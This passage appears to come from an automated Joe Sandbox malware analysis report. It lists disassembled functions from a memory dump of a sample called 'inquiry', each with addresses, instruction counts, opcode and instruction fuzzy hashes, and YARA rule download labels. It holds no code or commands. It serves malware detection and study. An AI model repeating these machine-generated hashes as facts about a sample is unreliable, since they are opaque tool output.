                                                                                                              • Opcode Fuzzy Hash: f117bb7c851d30c6fe1cfeb8a93371b56deee381247a848200520262826f5ccf
                                                                                                              • Instruction Fuzzy Hash: 8372BE75E002288FDB64DF69C895BDDBBB2AB89304F1081EAD50DA7354DB35AE81CF50
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E36B00 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: d
                                                                                                              • API String ID: 0-2564639436
                                                                                                              • Opcode ID: c2f08539acbe563d96905457196f082427af8cf4001900d605fe49fbf9509cb2
                                                                                                              • Instruction ID: 6ac9a94b3c24d7aceac317a8d08fa4c4048aa95b09cb7b0d82b5f3ddc1040220
                                                                                                              • Opcode Fuzzy Hash: c2f08539acbe563d96905457196f082427af8cf4001900d605fe49fbf9509cb2
                                                                                                              • Instruction Fuzzy Hash: 39812675E012089FDB14DFA9C98469DFBF2EF89304F25D129E818AB395EB345802CF41
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3BD40 Relevance: .8, Instructions: 785COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6c5396cbff580fc5e4a50ba7277699dbe7cbf1046c9f96e0bcd134028f4f33a0
                                                                                                              • Instruction ID: 35ad4e7b2ffddd6cfaa2f1144c6e7c4133c3a8ba6384d1fe997fb7c703aff1b2
                                                                                                              • Opcode Fuzzy Hash: 6c5396cbff580fc5e4a50ba7277699dbe7cbf1046c9f96e0bcd134028f4f33a0
                                                                                                              • Instruction Fuzzy Hash: F5725D35A00209DFCB15CF68C988AAEBBF2FF88304F259559E845BB261D735E951CF90
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E38218 Relevance: .5, Instructions: 511COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4021b403b4e1fa0e482091171c8f961a5214b2014fc9f72c7da6aea3dbb33995
                                                                                                              • Instruction ID: 3670db6539f6d81c47d560a3209804a969f496697c404e68bc216a6a6833f1d6
                                                                                                              • Opcode Fuzzy Hash: 4021b403b4e1fa0e482091171c8f961a5214b2014fc9f72c7da6aea3dbb33995
                                                                                                              • Instruction Fuzzy Hash: 30129E71A002199FDB14DF64C954BAEBBF6BF88308F148129E50AEB395EF359D41CB90
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E38840 Relevance: .5, Instructions: 464COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 03cce0a1c8da8ac1fdde0f0300bd6450fffd32afaeae2a965140ddf0bf8a66eb
                                                                                                              • Instruction ID: 3be8ae55ee29abfe495fcc937b654b0209d4e7d581de000c1760b201ed809f2b
                                                                                                              • Opcode Fuzzy Hash: 03cce0a1c8da8ac1fdde0f0300bd6450fffd32afaeae2a965140ddf0bf8a66eb
                                                                                                              • Instruction Fuzzy Hash: CB126F70A00209DFDB15CF68DA48AAEBBF6FF98304F159069F405AB2A1DB35ED41CB51
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E37998 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @[
                                                                                                              • API String ID: 0-4142845228
                                                                                                              • Opcode ID: f9faab20e8970a2b7bc3b1141462a62fb60839c44b19293db9cb3eb67cab1d6d
                                                                                                              • Instruction ID: 1b0bd14f0d6c58831c670029579555bbe515648b61a3f62fb33ddb3505826b9c
                                                                                                              • Opcode Fuzzy Hash: f9faab20e8970a2b7bc3b1141462a62fb60839c44b19293db9cb3eb67cab1d6d
                                                                                                              • Instruction Fuzzy Hash: 8861EE313042008FDB259B74C498B7EBBA7ABC9358F188068E586DB399DF39CC02C791
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E36E44 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @[
                                                                                                              • API String ID: 0-4142845228
                                                                                                              • Opcode ID: 323fa684427223d78e620c01a813ffdf2a75e6382a42cadbfd654a162ce7aa41
                                                                                                              • Instruction ID: f9e15c8e8140b62b92a565eeef47bb49cf87c2e2cc4ea5a71cea08c40387ee81
                                                                                                              • Opcode Fuzzy Hash: 323fa684427223d78e620c01a813ffdf2a75e6382a42cadbfd654a162ce7aa41
                                                                                                              • Instruction Fuzzy Hash: F5319E35704205EFDF059F64E958AAF3BA2FB88304F10C428F9499B255CB36CE16DB91
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E397F0 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @[
                                                                                                              • API String ID: 0-4142845228
                                                                                                              • Opcode ID: 3e5f1c963639a232162eea4145273f1b048964eda51d662a1d816df3d5c17190
                                                                                                              • Instruction ID: f4092c7b58393e21c8946cf891d3a7b203196f6aee72f0156737213e34a51f8a
                                                                                                              • Opcode Fuzzy Hash: 3e5f1c963639a232162eea4145273f1b048964eda51d662a1d816df3d5c17190
                                                                                                              • Instruction Fuzzy Hash: 7B21DA31B0420587EB281639845977A7A9BDFC675CF188039D503DB7A6DFBACC41E781
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E397E0 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @[
                                                                                                              • API String ID: 0-4142845228
                                                                                                              • Opcode ID: 809af1f6d169987749b665b618d09ccb2e497ac0d085da8a91f43c0ca170bd61
                                                                                                              • Instruction ID: 49bae06488588882677df7e2f32a0ece6601ff4e97a0127bd60fd9e969b022cf
                                                                                                              • Opcode Fuzzy Hash: 809af1f6d169987749b665b618d09ccb2e497ac0d085da8a91f43c0ca170bd61
                                                                                                              • Instruction Fuzzy Hash: 2C21FB317042058BEB29163888A967A7B979FC631CF1C8039D543DB7A7DBB9CC01E742
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E37B58 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @[
                                                                                                              • API String ID: 0-4142845228
                                                                                                              • Opcode ID: 4c7f94b714bf2b65d2cd512d5c2c1ce00ebceb35be4e9be7ed3c2f779d0cfe6c
                                                                                                              • Instruction ID: 7e863b2a68e1f72ba881275e54e42b923a6999b91e735fe92e411a6da3a7fb6b
                                                                                                              • Opcode Fuzzy Hash: 4c7f94b714bf2b65d2cd512d5c2c1ce00ebceb35be4e9be7ed3c2f779d0cfe6c
                                                                                                              • Instruction Fuzzy Hash: 6321CF323046118BC7249A29D85892BB7A7EFC8755B148469E98ADB354CF35DC01CBC0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3B3D9 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @[
                                                                                                              • API String ID: 0-4142845228
                                                                                                              • Opcode ID: d7b1e06618ea48d68056b615f039f4669aff51477674330640f6c834b7e8589c
                                                                                                              • Instruction ID: f35acbbca333e256f672e4d17e6034d8c471c282fa975a7fb28cca6146fd6e13
                                                                                                              • Opcode Fuzzy Hash: d7b1e06618ea48d68056b615f039f4669aff51477674330640f6c834b7e8589c
                                                                                                              • Instruction Fuzzy Hash: ED219C30E00209DFCB15DFA1D544AEEBFB6EF88304F248029E552F6265EB359941DF60
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E39D08 Relevance: .7, Instructions: 703COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6f2abe7c2197f7056ccfb83939ad42667d19062c9b6d065d53482bc21bd29d47
                                                                                                              • Instruction ID: d0d6bc1417d2c40d828ced132cc47a44dea6f6182cb664d5f4ef2a76ae060b74
                                                                                                              • Opcode Fuzzy Hash: 6f2abe7c2197f7056ccfb83939ad42667d19062c9b6d065d53482bc21bd29d47
                                                                                                              • Instruction Fuzzy Hash: B6520F74A0411C8FFB24ABA0C854BEEBB72FF85304F1180AAD24A6B355DB355E45DF52
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E38F69 Relevance: .5, Instructions: 472COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d24bdb53157d312f1a1484643209dbfb2bb1cc8e40ef1ed780fff6e358734e31
                                                                                                              • Instruction ID: 5b8fc8fbb616aff33697f44202493ae401e27de2bbc0d8c32d09ec58865d0b2e
                                                                                                              • Opcode Fuzzy Hash: d24bdb53157d312f1a1484643209dbfb2bb1cc8e40ef1ed780fff6e358734e31
                                                                                                              • Instruction Fuzzy Hash: 4C126B30A002089FCB24CF69D988A9EBBF2FF49318F159599E455EB3A2D771ED41CB50
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3E138 Relevance: .3, Instructions: 266COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 939d4a8b20be0e4f92919bd7301295601bddf2ce29b3e1487126d961717f2b63
                                                                                                              • Instruction ID: c7bdb7398f55c63bf5c3c910ed41fcb0bedc6c8e8673756c141270d48c03d1c0
                                                                                                              • Opcode Fuzzy Hash: 939d4a8b20be0e4f92919bd7301295601bddf2ce29b3e1487126d961717f2b63
                                                                                                              • Instruction Fuzzy Hash: 5D911631B052148FDB149B68C4596AEBFF6AFCA314F268169D915BB3D5CB34CC02CBA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E376A0 Relevance: .2, Instructions: 227COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bb5121aeb74fa0a91c61587429323ce86998d88d01fae8c52f733b45b7213227
                                                                                                              • Instruction ID: 9b1b88b88eb7638e3df2b901ab9bef926e0b70c5ba8a452d69016b966e46f2f7
                                                                                                              • Opcode Fuzzy Hash: bb5121aeb74fa0a91c61587429323ce86998d88d01fae8c52f733b45b7213227
                                                                                                              • Instruction Fuzzy Hash: C381CE307042149FDF28EF64C858BAE7BA6FB88345F058028F946EB384CB759D41CB91
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3B681 Relevance: .2, Instructions: 224COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5a1baebacbb0f488a662e2d9ddf5c5afff604d4af997fba952f2ae9f69efb65f
                                                                                                              • Instruction ID: b3cd5964db5d61ef9b1cca205d9044cdc295556f6d6f0756ca59141317965af2
                                                                                                              • Opcode Fuzzy Hash: 5a1baebacbb0f488a662e2d9ddf5c5afff604d4af997fba952f2ae9f69efb65f
                                                                                                              • Instruction Fuzzy Hash: 3F810431A00205DFC715CF28C88899ABFB6FF85325F15C667DA55AB351D331E815CBA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3BA41 Relevance: .2, Instructions: 205COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4e1af2e839c208bdf4ef04c1ba14acfce1ffd0ec4791c9c2dd6b879af1685927
                                                                                                              • Instruction ID: 94e7541fa76a0452a4e6415073b60e792dcb39c3fbe953b8e87a144bf5ed43a2
                                                                                                              • Opcode Fuzzy Hash: 4e1af2e839c208bdf4ef04c1ba14acfce1ffd0ec4791c9c2dd6b879af1685927
                                                                                                              • Instruction Fuzzy Hash: 9261D3317042058FDB15DB68C8957BEBBF6EF85304F19906AD606EB2A2DB39CC42C791
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E39548 Relevance: .2, Instructions: 201COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 56c831a9fe544315395b994b727ec835f73f1956d2ea34e15cdc4d8367730be6
                                                                                                              • Instruction ID: 31e400cc275585ff24f7be7cb5b45e325987c87da14a07d3debebcaa4eb0ff82
                                                                                                              • Opcode Fuzzy Hash: 56c831a9fe544315395b994b727ec835f73f1956d2ea34e15cdc4d8367730be6
                                                                                                              • Instruction Fuzzy Hash: 3F712D347102058FCB25DF29C488AAE7BF6AF49744F1510A6E406EB3B2DBB5DC41CB50
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E37D38 Relevance: .2, Instructions: 182COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bd304550a853625749d2b9e87b69ec636c02dd96845ad5d5d41cd189a81aba4d
                                                                                                              • Instruction ID: 26d41ad7e4b5aaa70c02e059ff1e800e550e78fe5888d97721bbbac2449dc635
                                                                                                              • Opcode Fuzzy Hash: bd304550a853625749d2b9e87b69ec636c02dd96845ad5d5d41cd189a81aba4d
                                                                                                              • Instruction Fuzzy Hash: A5618FB5B08605CFCB24CF69C4889A9BBF2BF8A304F5590A9D456EB365D731EC01CB61
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3B8A0 Relevance: .1, Instructions: 146COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 569b984cc5167c4a166f958dc4ee37bcf79d3496523aec91e38c77dad359da6c
                                                                                                              • Instruction ID: 964a1cd02a8f979035222c2c4bcc7b1f15300edf4e1ed06882ae91218df53e53
                                                                                                              • Opcode Fuzzy Hash: 569b984cc5167c4a166f958dc4ee37bcf79d3496523aec91e38c77dad359da6c
                                                                                                              • Instruction Fuzzy Hash: 405182317042049FDB10DB69C848BAABBE6EFC9354F14C066EA4ADB365D775CC41CB92
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3FD10 Relevance: .1, Instructions: 144COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cf8e3b24fb18b3651d8479988d60d3e60edcfacfa614e34cce1fc53c117a8348
                                                                                                              • Instruction ID: 3d3527a4cda0dfb550a7436da878fbb0d036ea5d3a955c483ddc90711ae82f1a
                                                                                                              • Opcode Fuzzy Hash: cf8e3b24fb18b3651d8479988d60d3e60edcfacfa614e34cce1fc53c117a8348
                                                                                                              • Instruction Fuzzy Hash: DF41C035B042008FD754AB38D86466A7BE2EF86304B11857DD455DB3E2DF75DC0ACBA2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3CBC8 Relevance: .1, Instructions: 120COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 16aefb966d78b285ffeb1c307379b2ade5e6aa1fccb048eb5e1f8d4514585d50
                                                                                                              • Instruction ID: c64e6cfcdf0f405a6722781d0c7cb8cedb5194be900508996bcedcf97386eb5a
                                                                                                              • Opcode Fuzzy Hash: 16aefb966d78b285ffeb1c307379b2ade5e6aa1fccb048eb5e1f8d4514585d50
                                                                                                              • Instruction Fuzzy Hash: A141E2327002049FCB149B74D8146AFBBF6AFC9214F158069E50AEB394DF359C02CBA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3C751 Relevance: .1, Instructions: 109COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 847e85f23c8536f23f7cc55d1b0b63ac2734a241d26e83fdf5a1fa10e09c0e8b
                                                                                                              • Instruction ID: a6325e5321571f1159b099be192538f44469b9484a1bec46967461e31df272b6
                                                                                                              • Opcode Fuzzy Hash: 847e85f23c8536f23f7cc55d1b0b63ac2734a241d26e83fdf5a1fa10e09c0e8b
                                                                                                              • Instruction Fuzzy Hash: 334139756002159FDB18DF68D848AAA7BB5FF49314F204069F906EB3B0CB31DD81CB91
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3450E Relevance: .1, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ac539c7e7e3aa35a92590b11662a3fc1b47b8fc8e16fb8da112058d33766a708
                                                                                                              • Instruction ID: 11d3ca37ef751e686ae9c31a92f6a8c7728254091655d270ab602c1927b8ca86
                                                                                                              • Opcode Fuzzy Hash: ac539c7e7e3aa35a92590b11662a3fc1b47b8fc8e16fb8da112058d33766a708
                                                                                                              • Instruction Fuzzy Hash: 3941D631D116299ADB14EFA5DC447DDFBB2BF89304F10C6A9D54877264EB302A8ACF81
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3CBB8 Relevance: .1, Instructions: 80COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7817eac3c07831b62873fec870334ca1e728b601e1d65b8fa736799e7d5cd97e
                                                                                                              • Instruction ID: 7d763a157de17c66dbc89a9c2a159fdc8c4e05623a98eae5cb50d4f7822f47be
                                                                                                              • Opcode Fuzzy Hash: 7817eac3c07831b62873fec870334ca1e728b601e1d65b8fa736799e7d5cd97e
                                                                                                              • Instruction Fuzzy Hash: 92217F35A01204ABDB149F75D849AAABBF6FF8C315F205069E946F7364DB32EC11CB60
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E3CDB7 Relevance: .1, Instructions: 74COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f110a7ceff0553e6121708011389ef66e4b645d8f12609d3e03dfe076f398afb
                                                                                                              • Instruction ID: b76819aff3550fd9536a5c4e0021c8221dfd06269eb33f1d6914e03193873524
                                                                                                              • Opcode Fuzzy Hash: f110a7ceff0553e6121708011389ef66e4b645d8f12609d3e03dfe076f398afb
                                                                                                              • Instruction Fuzzy Hash: C321AE72E002158FCB04CFA8C845AAEBBB6EF86354F25C155E115FB3A1C7359C82CBA0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E352A0 Relevance: .1, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e2d9102f2c1f0a0653cef431ff9ad496eb9b51ea36dc35bf500418d94e8de4e8
                                                                                                              • Instruction ID: 73936e67500412436a671a960d88802f79d9f8762e81498a0bf72886e486d05e
                                                                                                              • Opcode Fuzzy Hash: e2d9102f2c1f0a0653cef431ff9ad496eb9b51ea36dc35bf500418d94e8de4e8
                                                                                                              • Instruction Fuzzy Hash: 5D11E431B042404FDB55DB7888147BF7BF39FCA244F19806AC64ACB386DE398C068792
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00E38831 Relevance: .1, Instructions: 64COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5b2a9fcce0fafe352d134a117a2e3cf28023ed6b5009b92df014d8cabc57e5b0
                                                                                                              • Instruction ID: 019deb91205d4fa466c5cc17cedd3a92a8e218469d5e6f88c27481f5ece40fc2
                                                                                                              • Opcode Fuzzy Hash: 5b2a9fcce0fafe352d134a117a2e3cf28023ed6b5009b92df014d8cabc57e5b0
                                                                                                              • Instruction Fuzzy Hash: 71219031900304DFCB15CF64CA48BAABBF6EB44318F44846AF05AEB661D7759D48CF51
                                                                                                              Uniqueness

